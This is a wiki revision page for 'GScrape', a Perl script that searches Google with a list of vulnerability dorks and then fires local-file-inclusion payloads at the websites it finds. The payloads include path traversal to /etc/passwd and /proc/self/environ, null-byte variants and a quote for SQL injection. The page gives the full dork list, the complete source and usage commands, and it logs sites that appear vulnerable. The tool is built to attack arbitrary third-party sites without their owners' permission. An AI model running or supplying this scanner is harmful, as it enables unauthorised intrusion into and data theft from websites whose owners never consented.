Difference between revisions of "GScrape"
(→Search Terms) |
(→Search Terms) |
||
Line 16: | Line 16: | ||
==Search Terms== | ==Search Terms== | ||
These are just some examples of general search terms, they are not guaranteed to find any vulnerabilities. | These are just some examples of general search terms, they are not guaranteed to find any vulnerabilities. | ||
− | + | <pre> | |
.php?*= | .php?*= | ||
inurl:index.php?page= | inurl:index.php?page= | ||
Line 44: | Line 44: | ||
inurl:*.php?load= | inurl:*.php?load= | ||
inurl:*.php?naam= | inurl:*.php?naam= | ||
− | + | cat.asp?cat= | |
+ | Productlist.asp?Catalogid= | ||
+ | Category.asp?Category_Id= | ||
+ | Category.cfm?Category_Id= | ||
+ | category.asp?cid= | ||
+ | category.cfm?cid= | ||
+ | category.asp?cat= | ||
+ | category.cfm?cat= | ||
+ | category.asp?id= | ||
+ | index.cfm?Pageid= | ||
+ | category.asp?catid= | ||
+ | Category.asp?c= | ||
+ | Category.cfm?c= | ||
+ | Productlist.cfm?Catalogid= | ||
+ | Productlist.asp?Catalogid= | ||
+ | Viewitem.asp?Catalogid= | ||
+ | Viewitem.cfm?Catalogid= | ||
+ | catalog.cfm?Catalogid= | ||
+ | catalog.asp?Catalogid= | ||
+ | department.cfm?Dept= | ||
+ | department.asp?Dept= | ||
+ | Itemdetails.cfm?Catalogid= | ||
+ | Itemdetails.asp?Catalogid= | ||
+ | index.php?id= | ||
+ | trainers.php?id= | ||
+ | buy.php?category= | ||
+ | article.php?ID= | ||
+ | play_old.php?id= | ||
+ | declaration_more.php?decl_id= | ||
+ | Pageid= | ||
+ | games.php?id= | ||
+ | page.php?file= | ||
+ | newsDetail.php?id= | ||
+ | gallery.php?id= | ||
+ | article.php?id= | ||
+ | show.php?id= | ||
+ | staff_id= | ||
+ | newsitem.php?num= | ||
+ | readnews.php?id= | ||
+ | top10.php?cat= | ||
+ | historialeer.php?num= | ||
+ | reagir.php?num= | ||
+ | </pre> | ||
Please note that your search terms in the file DO NOT require "inurl:", GScrape adds it for you if it isn't there. | Please note that your search terms in the file DO NOT require "inurl:", GScrape adds it for you if it isn't there. | ||
Revision as of 11:11, 15 January 2012
Contents
Introduction
GScrape is a small perl script that uses Google's Ajax API (Google::Search in | CPAN) to find vulnerable websites.
The purpose of this script is to demonstrate that one can easily create simple tools to do tedious tasks.
Example
GScrape is a simple tool, it will look for a file specified by the user containing a list of search terms, query google with those search terms and retrieve an array of websites,
which are then tested for a Local File Inclusion vulnerability, if any are found they are logged to the output file specified by the user.
perl gscrape.pl -f dork.lst -o gscrape.log
GScrape will not return any results unless your input file actually contains a list of search terms. |
Search Terms
These are just some examples of general search terms, they are not guaranteed to find any vulnerabilities.
.php?*= inurl:index.php?page= inurl:include.php?*= index.php?include= inurl:index.php?nic= inurl:index.php?sec= inurl:index.php?content= inurl:index.php?link= inurl:index.php?filename= inurl:index.php?dir= inurl:index.php?document= inurl:index.php?view= inurl:*.php?sel= inurl:*.php?session=&content= inurl:*.php?locate= inurl:*.php?place= inurl:*.php?layout= inurl:*.php?go= inurl:*.php?catch= inurl:*.php?mode= inurl:*.php?name= inurl:*.php?loc= inurl:*.php?f= inurl:*.php?inf= inurl:*.php?pg= inurl:*.php?load= inurl:*.php?naam= cat.asp?cat= Productlist.asp?Catalogid= Category.asp?Category_Id= Category.cfm?Category_Id= category.asp?cid= category.cfm?cid= category.asp?cat= category.cfm?cat= category.asp?id= index.cfm?Pageid= category.asp?catid= Category.asp?c= Category.cfm?c= Productlist.cfm?Catalogid= Productlist.asp?Catalogid= Viewitem.asp?Catalogid= Viewitem.cfm?Catalogid= catalog.cfm?Catalogid= catalog.asp?Catalogid= department.cfm?Dept= department.asp?Dept= Itemdetails.cfm?Catalogid= Itemdetails.asp?Catalogid= index.php?id= trainers.php?id= buy.php?category= article.php?ID= play_old.php?id= declaration_more.php?decl_id= Pageid= games.php?id= page.php?file= newsDetail.php?id= gallery.php?id= article.php?id= show.php?id= staff_id= newsitem.php?num= readnews.php?id= top10.php?cat= historialeer.php?num= reagir.php?num=
Please note that your search terms in the file DO NOT require "inurl:", GScrape adds it for you if it isn't there.
Source
#!/usr/bin/perl # gscrape.pl # # Uses Google::Search to either iterate through a list of dorks (dorks.lst) # And then prints out a list of vulnerable sites. use Term::ANSIColor; use Getopt::Std; use HTTP::Request; use Google::Search; use LWP::UserAgent; #vars n stuff my $search; my $useragent = LWP::UserAgent->new(); my $infile; my $outfile; my $searchmode; my @url_list; my @search_terms; #search terms and my @dorks; #dorks, to check if the terms have "inurl:". my @vulnsites; ##--main execution: &banner(); &getOpts(); if ($opt{s} || $opt{f} && $opt{o} && !$opt{h}) { &printInfo("Trying with the following settings:"); &printInfo( ">>Search Mode: $searchmode"); &printInfo( ">>Output file: $outfile"); if ($searchmode == "single" && $searchmode != "list"){ &printInfo( ">>Search Term: $search"); &search_single(); } else { &printInfo( ">>Search List: $infile"); &search_list(); } } if (!$opt{h} && !$opt{o}){ &printCritical("YOU MUST SPECIFY AN OUTPUT FILE!1!one!"); &printInfo("use -h flag for help"); print"\n\r\nExiting..\n"; } ##--subroutines:. #Search using a list of terms: sub search_list(){ open FILE, "<", $infile or die $!; my @search_terms = <FILE>; my $num = @search_terms; &printInfo("Loaded $num search terms."); &printInfo("Fixing improper search terms [if any]"); #iterate through the search terms, checking if they have "inurl:" if not, prepend it. for( my $int = 0; $int < $num; $int++){ my $random = int(rand($num)); if ( @search_terms[$random] !~ /inurl:/ ){ ##had to learn to use regex sooner or later.. push(@dorks, "inurl:".@search_terms[$random]); } if ( @search_terms[$random] =~ /inurl:/){ push(@dorks, @search_terms[$random]); } } print"\n"; &printInfo("Retrieving search results.."); #iterate through the google dorks (search terms, with 'inurl:'), and add them to the list of sites. foreach(@dorks) { $search = Google::Search->Web( query => $_ ); while ( my $result = $search->next ) { if( $result->uri =~ /\=/) { #check if results have "=" in them (ex: www.site.com/index.php?page=LOLCATS) push(@url_list, $result->uri); #push result into the array &printInfo(">>".$result->uri); } } } my @lfitest = ( '/etc/passwd%00', '/etc/passwd', '/proc/self/environ%00', '/proc/self/environ', '../../../../../../../../../../../../../../../proc/self/environ', '../../../../../../../../../../../../../../../proc/self/environ%00', '../../../../../../../../../../../../../../../etc/passwd', '../../../../../../../../../../../../../../../etc/passwd%00', "'" ); my $lfinum = @lfitest; print"\n"; &printInfo("Testing sites for vulnerabilities.."); #Test the sites for vulns. foreach( @url_list ){ my $index = @url_list; my $randint = int(rand($index)); my $x = @url_list[$randint]; $x =~ s/=.*/=/ ; for (my $i = 0; $i < $lfinum; $i++){ if ( $x !~ /http:\/\// ){ $x = "http://".$x; } my $request = $useragent->get($x.@lfitest[$i]); my $result = $request->content; if ($result =~ m/root:x:/i || m/HTTP_USER_AGENT/){ &printVulnLFI(">>> ".$x.@lfitest[$i]); open FILE, ">>", $outfile or die $!; print FILE "[LFI VULN] >> ".$x.@lfitest[$i]."\n"; close FILE; last; } if ($result =~ m/error in your/i || m/syntax/i){ &printVulnSQLI(">>> ".$x.@lfitest[$i]); open FILE, ">>", $outfile or die $!; print FILE "[SQLI VULN] >> ".$x.@lfitest."'\n"; close FILE; last; } if ($result =~ m/hacking/i || m/reported/i || m/recorded/i || m/malicious/i){ &printCritical("> Whoops! Tripped an IDS at: ".$x." With: ".@lfitest[$i]); } } } } sub banner() { system('clear'); print("\r+=====================================================================+ \r| GScrape | \r| ________ _________ | \r| / _____/ / _____/ ________________ ______ ____ | \r| / \\ ___ \\_____ \\_/ ___\\_ __ \\__ \\ \\____ \\_/ __ \\ | \r| \\ \\_\\ \\/ \\ \\___| | \\// __ \\| |_> > ___/ | \r| \\______ /_______ /\\___ >__| (____ / __/ \\___ > | \r| \\/ \\/ \\/ \\/|__| \\/ | \r| | \r| | \r| Uses Google AJAX API to search for vulnerabilities | \r+=====================================================================+ \r \r www.BlackhatAcademy.org " ); printWarning("THE END USER IS LIABLE FOR THE USE OF THIS SOFTWARE. \rUSING THIS AGAINST ANY SYSTEM WITHOUT PERMISSION IS A CRIMINAL ACT \rTHE AUTHOR TAKES NO RESPONSIBILITY FOR THE END-USER'S ACTIONS.\n"); } sub getOpts(){ #option modes, and args. my $opt_string = 'f:o:h'; getopts( "$opt_string", \%opt ); #set vars of $outfile, and $infile if they are defined. if ($opt{o}){ $outfile = $opt{o}; } if ($opt{f}){ $infile = $opt{f}; $searchmode = "list"; } #Display help page if -h usage() if $opt{h}; } #YES HELLO, THIS IS HELP PAGE. sub usage(){ print(" GScrape Usage: Search using a list of search terms: -f /path/to/dorks.txt Define output file: -o results.out Example Usages: Run a list of search terms through the scanner: perl gscrape.pl -f ~/Dork.lst -o ~/result.out "); } #HERE BE ANSICOLOR: # [INFO] [CRITICAL] and [WARNING] messages sub printCritical(){ my $error = shift(@_); print color 'bold blue'; print "\r["; print color 'red'; print "CRITICAL"; print color 'bold blue'; print "] "; print color 'red'; print color 'reset'; print $error."\n"; } sub printWarning(){ my $error = shift(@_); print color 'bold blue'; print "\r["; print color 'yellow'; print "WARNING"; print color 'bold blue'; print "] "; print color 'reset'; print $error."\n"; } sub printInfo(){ my $info = shift(@_); print color 'bold blue'; print "\r["; print color 'reset'; print "INFO"; print color 'bold blue'; print "] "; print color 'reset'; print $info."\n"; } sub printVulnLFI(){ my $info = shift(@_); print color 'bold blue'; print "\r["; print color 'green'; print "LFI VULN "; print color 'bold blue'; print "] "; print color 'reset'; print $info."\n"; } sub printVulnSQLI(){ my $info = shift(@_); print color 'bold blue'; print "\r["; print color 'green'; print "SQLI VULN"; print color 'bold blue'; print "] "; print color 'reset'; print $info."\n"; } |
GScrape Visit the Web Exploitation Portal for complete coverage.
|